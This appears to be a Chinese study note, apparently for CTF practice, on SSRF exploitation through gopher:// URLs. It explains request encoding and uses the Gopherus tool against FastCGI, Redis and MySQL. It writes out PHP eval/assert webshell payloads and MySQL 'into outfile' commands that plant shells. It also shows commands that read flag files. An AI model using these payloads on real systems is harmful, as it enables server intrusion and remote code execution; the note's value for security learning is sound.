基础知识
基本格式
基本格式:URL:gopher://<host>:<port>/<gopher-path>
- web也需要加端口号80
- gophert协议默认端口为70
- gopheri请求不转发第一个字符
get请求
- 问号(?)需要转码为URL编码,也就是%3f
- 回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a
- 在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)
- URL编码改为大写,冒号注意英文冒号
- 如果使用BP发包需要进行两次u编码
- GET提交最后需要增加一个换行符
gopher://127.0.0.1:80/_
GET /get.php?a=hello HTTP/1.1
Host: 127.0.0.1
为什么bp要进行两次url编码
curl_exec()造成的SSRF,gopher协议需要使用二次URLEncode;
而file_get_contents()造成的SSRF,gopher协议就不用进行二次URLEncode
post请求
需要注意的是,post请求有4个参数为必要参数。
gopher://127.0.0.1:80/_
POST /post.php HTTP/1.1
host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
a=hello
当我们不得不添加别的参数
Cookie
POST /index.php HTTP/1.1
Host: localhost:80
Cookie: PHPSESSID=1f546328759632456215236845122365
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
uname=admin&passwd=admin
xxe
[[xxe]]
sql-get
[[sql注入]]
注意不要使用+当做空格,就页面里面用%20,bp或hackbar用%2520
[外链图片转存中…(img-kwRcQIhN-1711552424782)]
sql-post
[[sql注入]]
[外链图片转存中…(img-yt5YfBVj-1711552424782)]
文件上传
[[文件上传]]
前置知识
如何构造payload
使用
假设172.6.0.1:80页面有文件上传
gopher://172.6.0.1:80/_
文件包含
[[文件包含]]
Gopherus工具
使用范围
目前支持生成payload应用有:
MySQL (Port:3306)
FastCGI (Port:9000)
Memcached (Port:11211)
Redis (Port:6379)
Zabbix (Port:10050)
SMTP (Port:25)
RCE
python2 gopherus.py –exploit fastcgi(写支持的名字,如fastcgi,redis,mysql)
/var/www/html/index.php //?url= 页面的具体目录
ls
ls /
cat /flag.php
webshell
python2 gopherus.py –exploit fastcgi
/var/www/html/index.php //?url= 页面的具体目录
echo "<?php eval(\$_POST[123]);?>" >1.php //$_POST[]里面不能是字母,前面的 \ 不可少! 就用这个,别改就行!!!
python2 gopherus.py –exploit redis
PHPShell //这里有两个选项:ReverseShell应该是反弹shell PHPshell(填php也行)就是webshell了
/var/www/html/index.php
<?php eval($_POST["aaa"])?> //redis好像和fastcgi不同,他的webshell不能用,redis的POST里面是字母,他的是数字 用这个, //别改就行
mysql
不使用工具生成的话去看图片笔记
条件
因为是使用into outfile函数写入的,有一下限制
[[mysql-文件读写#1.13.3. 写文件]]
常规使用
python2 gopherus.py --exploit mysql
select "<?php @assert($_POST['t']);?>" into outfile '/var/www/html/1.php';
select "<?php @eval($_POST['t']);?>" into outfile '/var/www/html/4.php';
select load_file("/flag");
UDF 提权
https://www.sqlsec.com/udf/
redis未授权
如果对方有网站,
![[DS]Polar靶场web(一)](https://img-blog.csdnimg.cn/direct/0e1fae28501443a283a4d2d80e861dad.png)
